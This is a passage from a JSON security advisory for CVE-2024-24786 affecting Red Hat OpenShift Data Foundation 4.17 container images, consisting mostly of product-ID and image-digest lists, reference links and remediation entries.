"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24786"
},
{
"category": "external",
"summary": "RHBZ#2268046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786"
},
{
"category": "external",
"summary": "https://go.dev/cl/569356",
"url": "https://go.dev/cl/569356"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/",
"url": "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-2611",
"url": "https://pkg.go.dev/vuln/GO-2024-2611"
}
],
"release_date": "2024-03-05T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
